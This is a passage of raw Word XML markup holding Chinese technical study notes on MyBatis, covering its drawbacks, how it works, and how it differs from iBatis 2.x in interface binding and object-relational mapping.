      <w:r w:rsidR="004D54AF" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，需要程序控制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C35E8F" w:rsidRPr="00F41A4C" w:rsidRDefault="00C003F1" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>不方便调试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC32F9" w:rsidRPr="00F41A4C" w:rsidRDefault="0058131E" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidR="00FC32F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>移植性相对差点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44201" w:rsidRDefault="0017299D" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E44201" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>mybatis</w:t>
      </w:r>
      <w:r w:rsidR="00E44201" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>优点也是缺点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDBC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规范建立与数据库连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过反射打通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象与数据库参数之间相互转换的关系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ibatis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00AB61F0" w:rsidRDefault="0017299D" w:rsidP="00944ED8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现了接口绑定，使用更加方便。</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00AB61F0" w:rsidRDefault="00797951" w:rsidP="00797951">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ibatis2.x</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中我们需要在</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DAO</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的实现类中指定具体对应哪个</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>映射文件，</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现了</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DAO</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口与</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>映射文件的绑定，自动为我们生成接口的具体实现，使用起来变得更加省事和方便。</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这可以说是</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mybatis</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最重要的改进。</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRPr="00AB61F0" w:rsidRDefault="0017299D" w:rsidP="00944ED8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象关系映射的改进，效率更高</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8" w:rsidRPr="00AB61F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00797951" w:rsidP="00797951">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相信很多在使用</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ibatis2.x</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的朋友并没有通过</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ibatis</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>映射文件来实现对象间的关系映射。其实也确实没有必要那么做，因为</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ibatis2.x</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>采用的是</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>嵌套查询</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的方式将对象之间的关系通过查询语句的直接拼装来实现，其效果和在</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DAO</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中自行封装是一样的。</w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00944ED8">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944ED8" w:rsidRDefault="00944ED8" w:rsidP="00944ED8">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
